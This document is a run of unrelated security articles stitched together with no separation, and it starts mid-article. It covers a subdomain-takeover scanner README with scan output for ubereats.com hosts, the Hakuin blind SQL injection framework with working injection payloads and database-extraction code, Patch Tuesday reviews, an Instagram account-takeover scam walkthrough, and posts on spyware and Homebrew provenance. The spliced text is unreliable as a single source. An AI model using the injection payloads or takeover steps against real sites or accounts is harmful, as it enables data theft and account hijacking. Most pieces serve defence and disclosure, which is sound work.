Building this snapshot fuzzing environment on top of WTF provides several benefits. It enables us to perform precisely targeted fuzz testing of, otherwise, hard-to-pinpoint chunks of macOS kernel. We can perform the actual testing on commodity CPUs, which enables us to use our existing computer resources instead of being limited to a few cores. Additionally, although emulated execution speed is fairly slow, we can leverage Bosch to perform more complex instrumentation. Patches to Volatility and WTF projects, as well as additional support tooling, is available in our GitHub repository.
Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns, stealing user cookies, etc. It occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a CNAME in the DNS, but no host is providing content for it. Subhunter takes a given list of Subdomains" title="Subdomains">subdomains and scans them to check this vulnerability.
Features:
Auto update
Uses random user agents
Built in Go
Uses a fork of fingerprint data from well known sources (can-i-take-over-xyz)
$ git clone https://github.com/Nemesis0U/Subhunter.git $ go build subhunter.go
Usage:
Options:
Usage of subhunter: -l string File including a list of hosts to scan -o string File to save results -t int Number of threads for scanning (default 50) -timeout int Timeout in seconds (default 20)
[+] Nothing found at www.ubereats.com: Not Vulnerable [+] Nothing found at testauth.ubereats.com: Not Vulnerable [+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable [+] Nothing found at about.ubereats.com: Not Vulnerable [+] Nothing found at beta.ubereats.com: Not Vulnerable [+] Nothing found at ewp.ubereats.com: Not Vulnerable [+] Nothi ng found at edgetest.ubereats.com: Not Vulnerable [+] Nothing found at guest.ubereats.com: Not Vulnerable [+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable [+] Nothing found at info.ubereats.com: Not Vulnerable [+] Nothing found at learn.ubereats.com: Not Vulnerable [+] Nothing found at merchants.ubereats.com: Not Vulnerable [+] Nothing found at guest-beta.ubereats.com: Not Vulnerable [+] Nothing found at merchant-help.ubereats.com: Not Vulnerable [+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable [+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable [+] Nothing found at messages.ubereats.com: Not Vulnerable [+] Nothing found at order.ubereats.com: Not Vulnerable [+] Nothing found at restaurants.ubereats.com: Not Vulnerable [+] Nothing found at payments.ubereats.com: Not Vulnerable [+] Nothing found at static.ubereats.com: Not Vulnerable
Hakuin is a Blind SQL Injection (BSQLI) optimization and automationframework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.
More information can be found in our paper and slides.
Installation
To install Hakuin, simply run:
pip3 install hakuin
Developers should install the package locally and set the -e flag for editable mode:
git clone [email protected]:pruzko/hakuin.git cd hakuin pip3 install -e .
Examples
Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester and override the request method. Also, the method must determine whether the query resolved to True or False.
Example 1 - Query Parameter Injection with Status-based Inference
import aiohttp from hakuin import Requester
class StatusRequester(Requester): async def request(self, ctx, query): r = await aiohttp.get(f'http://vuln.com/?n=XXX" OR ({query}) --') return r.status == 200
Example 2 - Header Injection with Content-based Inference
class ContentRequester(Requester): async def request(self, ctx, query): headers = {'vulnerable-header': f'xxx" OR ({query}) --'} r = await aiohttp.get(f'http://vuln.com/', headers=headers) return 'found' in await r.text()
To start extracting data, use the Extractor class. It requires a DBMS object to contruct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.
Example 1 - Extracting SQLite/MySQL/PSQL/MSSQL
import asyncio from hakuin import Extractor, Requester from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL
class StatusRequester(Requester): ...
async def main(): # requester: Use this Requester # dbms: Use this DBMS # n_tasks: Spawns N tasks that extract column rows in parallel ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1) ...
if __name__ == '__main__': asyncio.get_event_loop().run_until_complete(main())
Now that eveything is set, you can start extracting DB metadata.
Example 1 - Extracting DB Schemas
# strategy: # 'binary': Use binary search # 'model': Use pre-trained model schema_names = await ext.extract_schema_names(strategy='model')
Once you know the structure, you can extract the actual content.
Example 1 - Extracting Generic Columns
# text_strategy: Use this strategy if the column is text res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
Example 2 - Extracting Textual Columns
# strategy: # 'binary': Use binary search # 'fivegram': Use five-gram model # 'unigram': Use unigram model # 'dynamic': Dynamically identify the best strategy. This setting # also enables opportunistic guessing. res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
Example 3 - Extracting Integer Columns
res = await ext.extract_column_int(table='users', column='id')
Example 4 - Extracting Float Columns
res = await ext.extract_column_float(table='products', column='price')
Example 5 - Extracting Blob (Binary Data) Columns
res = await ext.extract_column_blob(table='users', column='id')
More examples can be found in the tests directory.
Using Hakuin from the Command Line
Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:
python3 hk.py -h
For Researchers
This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.
Cite Hakuin
@inproceedings{hakuin_bsqli, title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models}, author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh}, booktitle={2023 IEEE Security and Privacy Workshops (SPW)}, pages={384--393}, year={2023}, organization={IEEE} }
As a developer, your work often involves experimenting with various libraries, frameworks, tools and sometimes testing unknown files or executables. But let's face it β accessing unfamiliar files or repos can sometimes feel like tiptoeing through a minefield. You do not know if they are safe or potential malware. What if I told you there's a way to explore new files without risking your host OS!
Β
Windows Sandbox (WSB) provides a lightweight desktop environment to safely run applications in isolation from the host OS. Think of it as your digital playground β a safe, isolated environment where you can test and debug apps, explore unknown files, or experiment with tools without risking your host OS. A Windows Sandbox is disposable. When it's closed, all the software and files and the state are deleted. You get a brand-new instance of the sandbox every time you open the application.
Β
How can you view or run untrusted content using Windows Sandbox?
Β
First, refer to the instructions provided in our documentation to determine if your device meets the requirements and learn how to install Windows Sandbox.
Β
There are multiple ways to share files between the host and the sandbox:
Option A - Drag and Drop files: Launch 'Windows Sandbox' by locating and selecting 'Windows Sandbox' on the Start menu or searching for 'Windows Sandbox'. With Clipboard redirection enabled by default, you can easily copy files from the host and paste them into the Windows Sandbox window. This is the simplest way to view your untrusted files and apps in your sandbox. This approach makes a copy within Sandbox, which can take a while depending on the size of the folder.
Option B - Map Folders before launching Sandbox: Create a folder, say 'sandbox-assets', on your host OS containing all files to be tested or viewed in Windows Sandbox. Any files or tools that you will need in the sandbox will need to be placed in this folder before launching the sandbox. You will then use a configuration file to map the 'sandbox-assets' folder your host to the 'sandbox-assets' folder in the sandbox.
The configuration file below shows how to share a folder from the host desktop to the sandbox desktop. In this example the file is shared with read-only permissions. Windows Sandbox will not be able to write to the folder, providing an additional layer of security.
Save the config file with a .wsb extension. To use the configuration file, double-click it to launch your custom configured Windows Sandbox. This should launch a sandbox with the folder 'sandbox-assets' with read-only access on the desktop with all the files you pasted.
Β
Β
When you're finished experimenting, close the sandbox. A dialog box will prompt you to confirm the deletion of all sandbox content. Select "Ok" to confirm.
Β
Learn more about Windows Sandbox and provide feedback
To learn more about Windows Sandbox and its functionality, check out our documentation.
Checkout our Windows Sandbox GitHub repo to share your projects that leverage Windows Sandbox, file feature requests or report issues.
You can also file a bug in Feedback Hub. There is a dedicated option in Feedback Hub to file "Windows Sandbox" bugs and feedback. It is located under "Security and Privacy" subcategory "Windows Sandbox".
Β
We look forward to you using this feature and receiving your feedback!
After a relatively hefty Microsoft Patch Tuesday in April, this monthβs security update from the company only included one critical vulnerability across its massive suite of products and services.Β Β
In all, Mayβs slate of vulnerabilities disclosed by Microsoft included 59 total CVEs, most of which are considered to be of βimportantβ severity. There is only one moderate-severity vulnerability.Β
The lone critical security issue is CVE-2024-30044, a remote code execution vulnerability in SharePoint Server. An authenticated attacker who obtains Site Owner permissions or higher could exploit this vulnerability by uploading a specially crafted file to the targeted SharePoint Server. Then, they must craft specialized API requests to trigger the deserialization of that fileβs parameters, potentially leading to remote code execution in the context of the SharePoint Server.Β
The Windows Mobile Broadband Driver also contains multiple remote code execution vulnerabilities:Β
However, to successfully exploit this issue, an adversary would need to physically connect a compromised USB device to the victim's machine.Β
Microsoft also disclosed a zero-day vulnerability in the Windows DWM Core Library, CVE-2024-30051. Desktop Window Manager (DWM) is a Windows operating system service that enables visual effects on the desktop and manages things like transitions between windows.Β Β Β
An adversary could exploit CVE-2024-30051 to gain SYSTEM-level privileges.Β Β
This vulnerability is classified as having a βlowβ level of attack complexity, and exploitation of this vulnerability has already been detected in the wild.Β Β
One other issue, CVE-2024-30046, has already been disclosed prior to Patch Tuesday, but has not yet been exploited in the wild. This is a denial-of-service vulnerability in ASP.NET, a web application framework commonly used in Windows.Β Β
Microsoft considers this vulnerability βless likelyβ to be exploited, as successful exploitation would require an adversary to spend a significant amount of time repeating exploitation attempts by sending constant or intermittent data to the targeted machine.Β Β Β
A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page.Β
In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.Β Β
The rules included in this release that protect against the exploitation of many of these vulnerabilities are 63419, 63420, 63422 - 63432, 63444 and 63445. There are also Snort 3 rules 300906 - 300912.
Welcome to the second Tuesday of May. As expected, Adobe and Microsoft have released their standard bunch of security patches. Take a break from your regular activities and join us as we review the details of their latest advisories. If youβd rather watch the full video recap covering the entire release, you can check it out here:
Apple Patches for May 2024
Apple kicked off the May release cycle with a group of updates for their macOS and iOS platforms. Most notable is a fix for CVE-2024-23296 for iOS 16.7.8 and iPadOS 16.7.8. This vulnerability is a memory corruption issue inΒ RTKit that could allow attackers to bypass kernel memory protections. The initial patch was released back in March, but Apple noted additional fixes would be coming, and here they are. This bug is reported as being under active attack, so if youβre using a device with an affected OS, make sure you get the update.
Apple also patched the Safari bug demonstrated at Pwn2Own Vancouver by Master of Pwn Winner Manfred Paul.
Adobe Patches for May 2024
For May, Adobe released eight patches addressing 37 CVEs in Adobe Acrobat and Reader, Illustrator, Substance3D Painter, Adobe Aero, Substance3D Designer, Adobe Animate, FrameMaker, and Dreamweaver. Eight of these vulnerabilities were reported through the ZDI program. The update for Reader should be the priority. It includes multiple Critical-rated bugs that are often used by malware and ransomware gangs. While none of these bugs are under active attack, it is likely some will eventually be exploited. The patch for Illustrator also addresses a couple of Critical-rated bugs that could result in arbitrary code execution. The patch for Aero (an augmented reality authoring and publishing tool) fixes a single code execution bug. Unless Iβm mistaken, this is the first Adobe patch for this product.
The fix for Adobe Animate fixes eight bugs, seven of which result in Critical-rated code execution. The patch for FrameMaker also fixes several code execution bugs. These are classic open-and-own bugs that require user interaction. Thatβs the same for the single bug fixed in Dreamweaver. The patch for Substance 3D Painter addresses four bugs, two of which are rated Critical, while the patch for Substance 3D Designer fixes a single Important-rated memory leak.
None of the bugs fixed by Adobe this month are listed as publicly known or under active attack at the time of release. Adobe categorizes these updates as a deployment priority rating of 3.
Microsoft Patches for May 2024
This month, Microsoft released 59 CVEs in Windows and Windows Components; Office and Office Components; .NET Framework and Visual Studio; Microsoft Dynamics 365; Power BI; DHCP Server; Microsoft Edge (Chromium-based); and Windows Mobile Broadband. If you include the third-party CVEs being documented this month, the CVE count comes to 63. A total of two of these bugs came through the ZDI program. As with last month, none of the bugs disclosed at Pwn2Own Vancouver are fixed with this release. With Apple and VMware fixing the vulnerabilities reported during the event, Microsoft stands alone as the only vendor not to produce patches from the contest.
Of the new patches released today, only one is rated Critical, 57 are rated Important, and one is rated Moderate in severity. This release is roughly a third of the size of last monthβs, so hopefully thatβs a sign that a huge number of fixes in a single month isnβt going to be a regular occurrence.
Two of the CVEs released today are listed as under active attack, and one other is listed as publicly known at the time of the release. Microsoft doesnβt provide any indication of the volume of attacks, but the DWM Core bug appears to me to be more than a targeted attack. Letβs take a closer look at some of the more interesting updates for this month, starting with the DWM bug currently exploited in the wild:
-Β Β Β Β Β Β CVE-2024-30051 β Windows DWM Core Library Elevation of Privilege Vulnerability This bug allows attackers to escalate the SYSTEM on affected systems. These types of bugs are usually combined with a code execution bug to take over a target and are often used by ransomware. Microsoft credits four different groups for reporting the bug, which indicates the attacks are widespread. They also indicate the vulnerability is publicly known. Donβt wait to test and deploy this update as exploits are likely to increase now that a patch is available to reverse engineer.
-Β Β Β Β Β Β CVE-2024-30043 β Microsoft SharePoint Server Information Disclosure Vulnerability This vulnerability was reported to Microsoft by ZDI researcher Piotr BazydΕo and represents an XML external entity injection (XXE) vulnerability in Microsoft SharePoint Server 2019. An authenticated attacker could use this bug to read local files with SharePoint Farm service account user privileges. They could also perform an HTTP-based server-side request forgery (SSRF), and β most importantly β perform NLTM relaying as the SharePoint Farm service account. Bugs like this show why info disclosure vulnerabilities shouldnβt be ignored or deprioritized.
-Β Β Β Β Β Β CVE-2024-30033 β Windows Search Service Elevation of Privilege Vulnerability This is another bug reported through the ZDI program and has a similar impact to the bug currently being exploited, although it manifests through a different mechanism. This is a link following bug in the Windows Search service. By creating a pseudo-symlink, an attacker could redirect a delete call to delete a different file or folder as SYSTEM. We discussed how this could be used to elevate privileges here. The delete happens when restarting the service. A low-privileged user can't restart the service directly. However, this could easily be combined with a bug that allows a low-privileged user to terminate any process by PID. After failure, the service will restart automatically, successfully triggering this vulnerability.
-Β Β Β Β Β Β CVE-2024-30050 β Windows Mark of the Web Security Feature Bypass Vulnerability We donβt normally detail Moderate-rated bugs, but this type of security feature bypass is quite in vogue with ransomware gangs right now. They zip their payload to bypass network and host-based defenses, they use a Mark of the Web (MotW) bypass to evade SmartScreen or Protected View in Microsoft Office. While we have no indication this bug is being actively used, we see the technique used often enough to call it out. Bugs like this one show why Moderate-rated bugs shouldnβt be ignored or deprioritized.
Hereβs the full list of CVEs released by Microsoft for May 2024:
* Indicates this CVE had been released by a third party and is now being included in Microsoft releases.
β Indicates further administrative actions are required to fully address the vulnerability.
Β
Thereβs just one Critical-rated bug this month, and it deals with a remote code execution (RCE) vulnerability in SharePoint server. An authenticated attacker could use this bug to execute arbitrary code in the context of the SharePoint Server. While permissions are needed for this to occur, any authorized user on the server has the needed level of permissions.
Looking at the other RCE bugs, we see a lot of vulnerabilities in rarely used protocols. The Windows Mobile Broadband driver and the Routing and Remote Access Service (RRAS) make up the bulk of this category. More notable are the two bugs in Hyper-V. One of these would allow an authenticated attacker to execute code on the host system. This would result in a guest-to-host escape, but Microsoft doesnβt indicate what level the code execution occurs on the host OS. After a couple of months with many SQL-related fixes, thereβs just one this month. As with the previous bugs, you would need to connect to a malicious SQL server. The bug in Cryptographic Services requires a machine-in-the-middle (MITM) but could lead to a malicious certificate being imported onto the target system. The RCE bugs are rounded out with open-and-own style bugs in Excel and .NET and Visual Studio.
Moving on to the elevation of privilege (EoP) patches in this monthβs release, almost all lead to SYSTEM-level code execution if an authenticated user runs specially crafted code. While there isnβt a lot else to say about these bugs, they are often used by attackers to take over a system when combined with a code execution bug β like the Excel bug mentioned above. They convince a user to open a specially crafted Excel document that executes the EoP and takes over the system. The lone exception to this is the bug in the Brokering File System component. The vulnerability allows attackers to gain the ability to authenticate against a remote host using the current userβs credentials. The attack could be launched from a low-privileged AppContainer, which would allow the attacker to execute code or access resources at a higher integrity level than that of the AppContainer execution environment.
Weβve already discussed the MotW security feature bypass (SFB), and the only other SFB vulnerability receiving a fix this month is the MSHTML engine. Just when you thought you were safe from Internet Explorer, the Trident engine rears its ugly head. This bug allows an unauthenticated attacker to get code execution if they can convince a user to open a malicious document. The code execution occurs in the context of the user, so this is another reminder not to log on with Admin privileges unless you absolutely need to.
There are only seven information disclosure bugs receiving fixes this month, and weβve already covered the one in SharePoint. As usual, most of these vulnerabilities only result in info leaks consisting of unspecified memory contents. The bug in Power BI could result in the disclosing of βsensitive information,β but Microsoft doesnβt narrow down what type of βsensitive informationβ could be leaked. Similarly, the bug in Deployment Services could leak βfile contents.β Microsoft provides no information on whether thatβs any arbitrary file contents or only specific files, so your guess is as good as mine.
The May release includes four spoofing bugs. The first is a stored cross-site scripting (XSS) bug in Azure Migrate. Thereβs not a straightforward patch for this one. You need the latest Azure Migrate Agent and ConfigManager updates. More info on how to do that can be found here. There are two spoofing bugs in Dynamics 365, but they read more like XSS bugs. The final spoofing bug addressed this month is in the Bing search engine. An attacker could modify the content of the vulnerable link to redirect the victim to a malicious site.
Thereβs a single Tampering bug addressed in this release fixing a bug in Microsoft Intune Mobile Application Management. An attacker could gain sensitive information on a target device that has been rooted.
The final bugs for May are Denial-of-Service (DoS) vulnerabilities in ASP.NET, DHCP server, and Hyper-V. Unfortunately, Microsoft provides no additional information about these bugs and how they would manifest on affected systems.
There are no new advisories in this monthβs release.
Looking Ahead
The next Patch Tuesday of 2024 will be on June 11, and Iβll return with details and patch analysis then. Until then, stay safe, happy patching, and may all your reboots be smooth and clean!
Instagram, with its vast user base and dynamic platform, has become a hotbed for scams and fraudulent activities. From phishing attempts to fake giveaways, scammers employ a range of tactics to exploit user trust and vulnerability. These scams often prey on peopleβs desire for social validation, financial gain, or exclusive opportunities, luring them into traps that can compromise their personal accounts and identity.
McAfee has observed a concerning scam emerging on Instagram, where scammers are exploiting the platformβs influencer program to deceive users. This manipulation of the influencer ecosystem underscores the adaptability and cunning of online fraudsters in their pursuit of ill-gotten gains.
Brand Ambassador and influencer program scams:
The Instagram influencer program, designed to empower content creators and influencers by providing opportunities for collaboration and brand partnerships, has inadvertently become a target for exploitation. Scammers are leveraging the allure of influencer status to lure unsuspecting individuals into fraudulent schemes, promising fame, fortune, and exclusive opportunities in exchange for participation.
The first step involves a cybercrook creating a dummy account and using it to hack into a targetβs Instagram account. Using those hacked accounts hackers then share posts about Bitcoin and other cryptocurrencies. Finally, the hacked accounts are used to scam target friends with a request that they vote for them to win an influencer contest.
After this series of steps is complete, the scammer will first identify the target and then send them a link with a Gmail email address to vote in their favor.
Fig 1: Scammer Message
While the link in the voting request message likely leads to a legitimate Instagram page, victims are often directed to an Instagram email update page upon clicking β not the promised voting page. Β Also, since the account sending the voting request is likely familiar to the scam target, they are more likely to enter the scammerβs email ID without examining it closely.
During our research, we saw scammers like Instagramβs accounts center link to their targets like below hxxp[.]//accountscenter.instagram.com/personal_info/contact_points/contact_point_type=email&dialog_type=add_contact_point
Fig 2. Email Updating Page
We took this opportunity to gain more insight into the details of how these deceptive tactics are carried out, creating an email account (scammerxxxx.com and victimxxxx.com) and a dummy Instagram account using that email (victimxxxx.com) for testing purposes.
Fig 3. Victimβs Personal Details
We visited the URL provided in the chat and entered our testing email ID scammerxxxx.com instead of entering the email address provided by the scammer, which was β[email protected]β
Fig 4. Adding Scammerβs Email Address in Victim Account
After adding the scammerxxxx.com address in the email address field, we received a notification stating, βAdding this email will replace vitimxxxx.com on this Instagram accountβ.
This is the point at which a scam target will fall victim to this type of scam if they are not aware that they are giving someone else, with access to the scammerxxxx.com email address, control of their Instagram account.
After selecting Next, we were redirected to the confirmation code page. Here, scammers will send the confirmation code received in their email account and provide that code to victims, via an additional Instagram message, to complete the email updating process.
In our testing case, the verification code was sent to the email address scammerxxxx.com.
Fig 5. Confirmation Code Page
We received the verification code in our scammerxxxx.com account and submitted it on the confirmation code page.
Fig 6. Confirmation Code Mail
Once the βAdd an Email Addressβ procedure is completed, the scammerβs email address is linked to the victimβs Instagram account. As a result, the actual user will be unable to log in to their account due to the updated email address.
Fig 7. Victimβs Profile after updating Scammerβs email
Because the scammerβs email address (scammerxxxx.com) was updated the account owner β the scam victim will not be able to access their account and will instead receive the message βSorry, your password was incorrect. Please double-check your password.β
Fig 8. Victim trying to login to their account.
The scammer will now change the victimβs account password by using the βforgot passwordβ function with the new, scammer email login ID.
Fig 9. Forgot Password Page
Β
The password reset code will be sent to the scammerβs email address (scammerxxxx.com).
Fig 10. Reset the Password token received in the Scammerβs email
After getting the email, the scammer will βReset your passwordβ for the victimβs account.
Fig 11. Scammer Resetting the Password
After resetting the password, the scammer can take over the victimβs Instagram account.
Fig 12. The scammer took over the victimβs Instagram account.
To protect yourself from Instagram scams:
Be cautious of contests, polls, or surveys that seem too good to be true or request sensitive information.
Verify the legitimacy of contests or giveaways by checking the accountβs authenticity, looking for official rules or terms, and researching the organizer.
Avoid clicking on suspicious links or providing personal information to unknown sources.
Enable two-factor authentication(2FA) on your Instagram account to add an extra layer of security.
Report suspicious activity or accounts to Instagram for investigation.
If any of your friends ask you to help them, contact them via text message or phone call, to ensure that their account has not been hacked first.
Cisco Talos is delighted to share updates about our ongoing partnership with the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to combat cybersecurity threats facing civil society organizations.
Talos has partnered with CISA on several initiatives through the Joint Cyber Defense Collaborative (JCDC), including sharing intelligence on strategic threats of interest.
Adversaries are leveraging advancements in technology and the interconnectedness of the worldβs networks to undermine democratic values and interests by targeting high-risk communities within civil society. According to CISA, these communities include activists, journalists, academics and organizations engaged in advocacy and humanitarian causes. Consequently, the U.S. government has elevated efforts in recent years to counter cyber threats that have placed the democratic freedoms of organizations and individuals at heightened risk.
The JCDCβs High-Risk Community Protection (HRCP) initiative is one such measure that brings together government, technology companies, and civil society organizations to strengthen the security of entities at heightened risk of cyber threat targeting and transnational repression.
The HRCP initiativeβs outputs β including a threat mitigation guideΒ for civil society, operational best practices, and online resources for communities at risk β aim to counter the threats posed by state-sponsored advanced persistent threats (APTs) and, increasingly, private-sector offensive actors (PSOA).
Our ongoing partnership with CISA and contributions to the JCDCβs HRCP initiative are consistent with Ciscoβs security mission to protect data, systems, and networks, and uphold and respect the human rights of all.
Spyware threats persist despite government and private sector measures
As weβve written about, the use of commercially available spyware to target high-profile or at-risk individuals and organizations is a global problem. This software can often track targetsβ exact location, steal their messages and personal information, or even listen in on phone calls. Private companies, commonly referred to as βPSOAsβ or βcyber mercenaries,β have monetized the development of these offensive tools, selling their spyware to any government willing to pay regardless of the buyer's intended use.
Commercial spyware tools can threaten democratic values by enabling governments to conduct covert surveillance on citizens, undermining privacy rights and freedom of expression. Lacking any international laws or norms around the use of commercial spyware, this surveillance can lead to the suppression of dissent, erosion of trust in democratic institutions, and consolidation of power in the hands of authoritarian governments.
The U.S. and its partners have taken steps to curb the proliferation of these dangerous tools. These include executive orders banning the use of certain spyware by U.S. government agencies, export restrictions and sanctions on companies or individuals involved in the development and sale of spyware (such as the recent sanctioning of members of the Intellexa Commercial Spyware Consortium), and diplomatic efforts with international partners and allies to pressure countries that harbor or support such firms.
Private industry has also played a substantial role in countering this threat, including by publishing research and publicly attributing PSOAs and countries involved in digital repression. Some companies have also developed countersurveillance technologies (such as Appleβs Lockdown Mode) to protect high-risk users and have initiated legal challenges through lawsuits against PSOAs alleging privacy violations. In March 2023, Cisco proudly became principal co-author of the Cybersecurity Tech Accord principles limiting offensive operations in cyberspace, joining several technology partners in calling for industry-wide principles to counter PSOAs.
Talos intelligence fuels HRCP threat mitigation guide for civil society
Talos has tracked the evolution of the commercial spyware industry and APT targeting of high-risk industries, placing us in a strong position to contribute our knowledge to the HRCP effort. Our research on two key threat actors β the Intellexa Commercial Spyware Consortium and the China state-sponsored Mustang Panda group β informed the HRCP guideβs overview of tactics commonly used against high-risk communities.
Talos has closely monitored threats stemming from the Intellexa Consortium, an umbrella group of organizations and individuals that offer commercial spyware tools to global customers, including authoritarian governments. In May 2023, we conducted a technical analysis of Intellaxaβs flagship PREDATOR spyware which was initially developed by a PSOA known as Cytrox. Our research specifically looked at two components of Intellexa's mobile spyware suite known as βALIENβ and βPREDATOR,β which compose the backbone of the organizationβs implant.
Our findings included an in-depth walkthrough of the infection chain, including the implantβs various information-stealing capabilities and evasion techniques. Over time, we learned more about Intellexaβs inner workings, including their spyware development timelines, product offerings, operating paradigms and procedures.
Our research on Mustang Panda also contributed to the mitigation guide by illustrating how government-sponsored threat actors have targeted civil society organizations with their own signature tools and techniques. This APT is heavily focused on political espionage and has targeted non-governmental organizations (NGOs), religious institutions, think tanks, and activist groups worldwide. Mustang Panda commonly sends spear phishing emails using enticing lures to gain access to victim networks and install custom implants, such as PlugX, that enable device control and user monitoring. The group has continuously evolved its delivery mechanisms and payloads to ensure long-term uninterrupted access, underscoring the threat posed to civil society and others.
What is next for this growing threat?
Threat actors with ties to Russia, China, and Iran have primarily been responsible for this heightened threat activity, according to industry reporting. But the threat is not limited to them. Last year, a U.K. National Cyber Security Centre (NCSC) estimate found that at least 80 countries have purchased commercial spyware, highlighting how the proliferation of these tools enables even more actors to join the playing field.
Yet we are staying ahead of the game. Talos researchers are continuously identifying the latest trends in threat actor targeting which include not only the use of commercial spyware but other tools and techniques identified in the HRCP guide, such as spear phishing and trojanized applications. Our intelligence powers Ciscoβs security portfolio, ensuring customer safety.
Talos created a reporting resource where individuals or organizations suspected of being infected with commercial spyware can contact Talosβ research team ([email protected]) to assist in furthering the communityβs knowledge of these threats.
We are determined to continue our work with CISA, other agencies, and industry leaders, leveraging the power of partnerships to protect Cisco customers and strengthen community resilience against common adversaries.
Today, we are pleased to announce that the core of that work is live and in public beta: homebrew-core is now cryptographically attesting to all bottles built in the official Homebrew CI. You can verify these attestations with our (currently external, but soon upstreamed) brew verify command, which you can install from our tap:
This means that, from now on, each bottle built by Homebrew will come with a cryptographically verifiable statement binding the bottleβs content to the specific workflow and other build-time metadata that produced it. This metadata includes (among other things) the git commit and GitHub Actions run ID for the workflow that produced the bottle, making it a SLSA Build L2-compatible attestation:
In effect, this injects greater transparency into the Homebrew build process, and diminishes the threat posed by a compromised or malicious insider by making it impossible to trick ordinary users into installing non-CI-built bottles.
This work is still in early beta, and involves features and components still under active development within both Homebrew and GitHub. As such, we donβt recommend that ordinary users begin to verify provenance attestations quite yet.
For the adventurous, however, read on!
A quick Homebrew recap
Homebrew is an open-source package manager for macOS and Linux. Homebrewβs crown jewel is homebrew-core, a default repository of over 7,000 curated open-source packages that ship by default with the rest of Homebrew. homebrew-coreβs packages are downloaded hundreds of millions of times each year, and form the baseline tool suite (node, openssl, python, go, etc.) for programmers using macOS for development.
One of Homebrewβs core features is its use of bottles: precompiled binary distributions of each package that speed up brew install and ensure its consistency between individual machines. When a new formula (the machine-readable description of how the package is built) is updated or added to homebrew-core, Homebrewβs CI (orchestrated through BrewTestBot) automatically triggers a process to create these bottles.
After a bottle is successfully built and tested, itβs time for distribution. BrewTestBot takes the compiled bottle and uploads it to GitHub Packages, Homebrewβs chosen hosting service for homebrew-core. This step ensures that users can access and download the latest software version directly through Homebrewβs command-line interface. Finally, BrewTestBot updates references to the changes formula to include the latest bottle builds, ensuring that users receive the updated bottle upon their next brew update.
In sum: Homebrewβs bottle automation increases the reliability of homebrew-core by removing humans from the software building process. In doing so, it also eliminates one specific kind of supply chain risk: by lifting bottle builds away from individual Homebrew maintainers into the Homebrew CI, it reduces the likelihood that a maintainerβs compromised development machine could be used to launch an attack against the larger Homebrew user base1.
At the same time, there are other aspects of this scheme that an attacker could exploit: an attacker with sufficient permissions could potentially upload malicious builds directly to homebrew-coreβs bottle storage, potentially leveraging alert fatigue to trick users into installing despite a checksum mismatch. More concerningly, a compromised or rogue Homebrew maintainer could surreptitiously replace both the bottle and its checksum, resulting in silently compromised installs for all users onwards.
This scenario is a singular but nonetheless serious weakness in the software supply chain, one that is well addressed by build provenance.
Build provenance
In a nutshell, build provenance provides cryptographically verifiable evidence that a software package was actually built by the expected βbuild identityβ and not tampered with or secretly inserted by a privileged attacker. In effect, build provenance offers the integrity properties of a strong cryptographic digest, combined with an assertion that the artifact was produced by a publicly auditable piece of build infrastructure.
In the case of Homebrew, that βbuild identityβ is a GitHub Actions workflow, meaning that the provenance for every bottle build attests to valuable pieces of metadata like the GitHub owner and repository, the branch that the workflow was triggered from, the event that triggered the workflow, and even the exact git commit that the workflow ran from.
This data (and more!) is encapsulated in a machine-readable in-toto statement, giving downstream consumers the ability to express complex policies over individual attestations:
Build provenance and provenance more generally are not panaceas: they arenβt a substitute for application-level protections against software downgrades or confusion attacks, and they canβt prevent βprivate conversation with Satanβ scenarios where the software itself is malicious or compromised.
Despite this, provenance is a valuable building block for auditable supply chains: it forces attackers into the open by committing them to public artifacts on a publicly verifiable timeline, and reduces the number of opaque format conversions that an attacker can hide their payload in. This is especially salient in cases like the recent xz-utils backdoor, where the attacker used a disconnect between the upstream source repository and backdoored tarball distribution to maintain their attackβs stealth. Or in other words: build provenance wonβt stop a fully malicious maintainer, but it will force their attack into the open for review and incident response.
Our implementation
Our implementation of build provenance for Homebrew is built on GitHubβs new artifact attestations feature. We were given early (private beta) access to the feature, including the generate-build-provenance action and gh attestation CLI, which allowed us to iterate rapidly on a design that could be easily integrated into Homebrewβs pre-existing CI.
This gives us build provenance for all current and future bottle builds, but we were left with a problem: Homebrew has a long βtailβ of pre-existing bottles that are still referenced in formulae, including bottles built on (architecture, OS version) tuples that are no longer supported by GitHub Actions2. This tail is used extensively, leaving us with a dilemma:
Attempt to rebuild all old bottles. This is technically and logistically infeasible, both due to the changes in GitHub Actionsβ own supported runners and significant toolchain changes between macOS versions.
Only verify a bottleβs build provenance if present. This would effectively punch a hole in the intended security contract for build provenance, allowing an attacker to downgrade to a lower degree of integrity simply by stripping off any provenance metadata.
